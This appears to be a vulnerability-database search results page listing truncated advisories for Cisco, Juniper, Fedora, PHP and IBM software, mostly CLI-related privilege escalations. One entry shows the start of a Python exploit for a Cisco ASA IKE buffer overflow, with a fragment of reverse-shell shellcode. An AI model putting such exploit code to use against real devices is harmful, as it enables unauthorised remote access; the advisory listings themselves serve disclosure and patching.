Design/Logic Flaw

Cisco Prime Network Analysis Module NAM before 6.11 patch.6.1-2-final and 6.2.x before 6.21 and Prime Virtual Network Analysis Module vNAM before 6.11 patch.6.1-2-final and 6.2.x before 6.21 allow local users to obtain root access via crafted CLI input, aka Bug ID CSCuy21892...

CVE-2016-1390

Cisco Prime Network Analysis Module NAM before 6.11 patch.6.1-2-final and 6.2.x before 6.21 and Prime Virtual Network Analysis Module vNAM before 6.11 patch.6.1-2-final and 6.2.x before 6.21 allow local users to obtain root access via crafted CLI input, aka Bug ID CSCuy21892...

CVE-2016-1390

Cisco Prime Network Analysis Module (NAM) and Cisco Prime Virtual Network Analysis Module (vNAM) are affected by CVE-2016-1390. The issue arises from insufficient sanitization of CLI input, allowing a local, authenticated attacker to obtain root privileges by crafting input that is processed by t...

Cisco ASA Software 8.x/9.x - IKEv1 / IKEv2 Buffer Overflow

!/usr/bin/env python2.7 import socket import sys import struct import string import random import time Spawns a reverse cisco CLI cliShellcode = "\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04" "\x8b\x40\x08\x8b\x40\x04\x8b\x00\x85\xc0\x74\x3b\x50\x8b\x40\x08"...

Cisco Nexus Operating System Devices Command Line Interface Local Privilege Escalation Vulnerability (Cisco-SA-20150701-CVE-2015-4237)

A vulnerability in the Command Line Interface CLI parser of Cisco Nexus Operating System NX-OS devices could allow an authenticated, local attacker to perform a privilege escalation. Copyright C 2016 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and...

Cisco NX-OS Software TACACS+ Command Authorization Vulnerability (Cisco-SA-20150202-CVE-2014-8013)

A vulnerability in the TACACS+ command authorization feature of Cisco NX-OS Software could allow an authenticated, local attacker to cause the system to reset. Copyright C 2016 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the...

Fedora Update for openvas-cli FEDORA-2016-9851

The remote host is missing an update for the SPDX-FileCopyrightText: 2016 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Fedora 22 : openvas-cli-1.4.4-1.fc22 / openvas-gsa-6.0.10-3.fc22 / openvas-libraries-8.0.7-2.fc22 / etc (2016-9851b69dbb)

Bump to latest upstream bugfix releases. Contains Security fix for CVE-2016-1926 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without...

[SECURITY] Fedora 22 Update: openvas-cli-1.4.4-1.fc22

OpenVAS CLI contains the command line tool "omp" which allows to create bat ch processes to drive OpenVAS Manager...

[SECURITY] Fedora 24 Update: i7z-0.27.2-16.20150629gitec09c4f.fc24

i7z is a CLI curses based monitoring tool for Intel Core i7, i5 and i3 processors...

Juniper Networks Junos OS Multiple Privilege Escalation Vulnerabilities (JSA10739)

Junos OS is prone to multiple privilege escalation vulnerabilities. SPDX-FileCopyrightText: 2016 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/o:juniper:junos...

[SECURITY] Fedora 23 Update: openvas-cli-1.4.4-1.fc23

OpenVAS CLI contains the command line tool "omp" which allows to create bat ch processes to drive OpenVAS Manager...

[SECURITY] Fedora 23 Update: i7z-0.27.2-16.20150629gitec09c4f.fc23

i7z is a CLI curses based monitoring tool for Intel Core i7, i5 and i3 processors...

Bumble: AWS S3 Bucket hotornot-images permissions allow for listing and removing files

We do not use amazon AWS but @yaworsk wanted to disclose his report anyway. Why not, we can do. ---- Hi All, Though I'm not 100% sure you own the bucket - and if not, I would appreciate being able to close this myself - I believe you may own the S3 bucket hotornot-images. If so, using the AWS CLI...

CVE-2016-1271

Juniper Junos OS before 12.1X46-D45, 12.1X47 before 12.1X47-D30, 12.3 before 12.3R11, 12.3X48 before 12.3X48-D25, 13.2 before 13.2R8, 13.3 before 13.3R7, 14.1 before 14.1R6, 14.2 before 14.2R4, 15.1 before 15.1R1 or 15.1F2, and 15.1X49 before 15.1X49-D15 allow local users to gain privileges via...

Design/Logic Flaw

Juniper Junos OS before 12.1X46-D45, 12.1X47 before 12.1X47-D30, 12.3 before 12.3R11, 12.3X48 before 12.3X48-D25, 13.2 before 13.2R8, 13.3 before 13.3R7, 14.1 before 14.1R6, 14.2 before 14.2R4, 15.1 before 15.1R1 or 15.1F2, and 15.1X49 before 15.1X49-D15 allow local users to gain privileges via...

CVE-2016-1271

Juniper Junos OS before 12.1X46-D45, 12.1X47 before 12.1X47-D30, 12.3 before 12.3R11, 12.3X48 before 12.3X48-D25, 13.2 before 13.2R8, 13.3 before 13.3R7, 14.1 before 14.1R6, 14.2 before 14.2R4, 15.1 before 15.1R1 or 15.1F2, and 15.1X49 before 15.1X49-D15 allow local users to gain privileges via...

IBM DB2 10.1 < Fix Pack 5 Multiple Vulnerabilities (Bar Mitzvah)

Binary data 9197.prm...

Fedora 23 : php-5.6.20-1.fc23 (2016-1cf1b49047)

31 Mar 2016, PHP 5.6.20 CLI Server: Fixed bug php69953 Support MKCALENDAR request method. Christoph Core: Fixed bug php71596 Segmentation fault on ZTS with date function setlocale. Anatol Curl: - Fixed bug php71694 Support constant CURLMADDEDALREADY. mpyw Date: - Fixed bug php71635...

Fedora 22 : php-5.6.20-1.fc22 (2016-9282d83bee)

31 Mar 2016, PHP 5.6.20 CLI Server: Fixed bug php69953 Support MKCALENDAR request method. Christoph Core: Fixed bug php71596 Segmentation fault on ZTS with date function setlocale. Anatol Curl: - Fixed bug php71694 Support constant CURLMADDEDALREADY. mpyw Date: - Fixed bug php71635...